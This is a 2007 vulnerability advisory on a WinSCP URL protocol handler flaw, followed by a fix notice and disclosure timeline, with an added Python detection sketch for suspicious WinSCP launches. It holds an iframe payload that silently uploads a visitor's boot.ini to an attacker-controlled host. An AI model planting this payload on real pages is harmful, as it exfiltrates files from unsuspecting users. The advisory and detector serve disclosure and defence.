‘WinSCP URL Protocol Handler Flaw’
Summary
‘
Since version 3.8.2 there is a sort of protection against this, but this does not stop all forms of attack.’
Credit:
‘The information has been provided by Kender.Security.’
Details
‘Vulnerable Systems:
* WinSCP version 4.0.3
Immune Systems:
* WinSCP version 4.0.4
On a machine you control, set up an scp-only account with the username ‘scp’ and any password. Place this on a website:
<iframe src=’scp:password@yourhost.com:’ /console /command ‘option confirm off’ ‘put c:boot.ini’ close exit ”/>
This will upload a file to the server when the page is visited by a user with a vulnerable WinSCP installed.
Downloading a file from the server to any location writable by the current user also works.
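A detection sketch for the behaviour described above, added here as an example and not part of the original advisory or of WinSCP: it flags a WinSCP process whose command line carries a session URL together with the /console or /command switches. The event layout, the browser list, the install path and the sample events are assumptions constructed for illustration.

```python
import re

# Assumptions of this example (not from the advisory): events arrive as
# (parent_image, command_line) pairs, and a launch made through the URL
# handler should carry one session URL and no other arguments.
SWITCHES = {"/console", "/command"}          # switches named in the advisory
BROWSERS = {"iexplore.exe", "firefox.exe"}   # constructed list, extend locally
URL_RE = re.compile(r"^(scp|sftp):", re.I)   # sftp added as an assumption
TOKEN_RE = re.compile(r'"[^"]*"|\S+')        # quoted string or bare word


def basename(path):
    """Lower-cased file name of a Windows or POSIX style path."""
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()


def check_launch(parent_image, cmdline):
    """Return reason codes for a suspicious WinSCP launch, [] if none."""
    tokens = TOKEN_RE.findall(cmdline)
    if not tokens or basename(tokens[0]) != "winscp.exe":
        return []
    args = [t.strip('"') for t in tokens[1:]]
    if not any(URL_RE.match(a) for a in args):
        return []                  # scripted use without a URL is out of scope
    reasons = []
    if len(args) > 1:              # something followed or preceded the URL
        reasons.append("extra-args")
    if any(a.lower() in SWITCHES for a in args):
        reasons.append("switches")
    if reasons and basename(parent_image) in BROWSERS:
        reasons.append("browser-parent")
    return reasons


# Constructed sample events, not taken from real logs.
WINSCP = r'"C:\Program Files\WinSCP\WinSCP.exe"'
SAMPLES = [
    (r"C:\Program Files\Internet Explorer\iexplore.exe",
     WINSCP + ' "scp://user@files.example.com/"'),
    (r"C:\Program Files\Internet Explorer\iexplore.exe",
     WINSCP + ' "scp://scp:x@host.example:" /console /command'
              ' "option confirm off" "put FILE" close exit ""'),
    (r"C:\Windows\System32\cmd.exe",
     WINSCP + ' /console /command "option confirm off" close'),
]

if __name__ == "__main__":
    for parent, cmd in SAMPLES:
        print(check_launch(parent, cmd) or "ok", "<-", cmd)
```

A plain URL launch from a browser and a scripted run without a URL both pass; only the combination of a URL with switches or extra arguments is reported.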
Solution:
Upgrade to version 4.04 or higher from http://winscp.net/download.php
Disclosure Timeline
24-Jul-2007 Vulnerability reported to Martin Prikryl
25-Jul-2007 Proposed fix to Martin
31-Jul-2007 Response from Martin
01-Sep-2007 Martin confirms fix
02-Sep-2007 New version done
06-Sep-2007 WinSCP v4.04 released’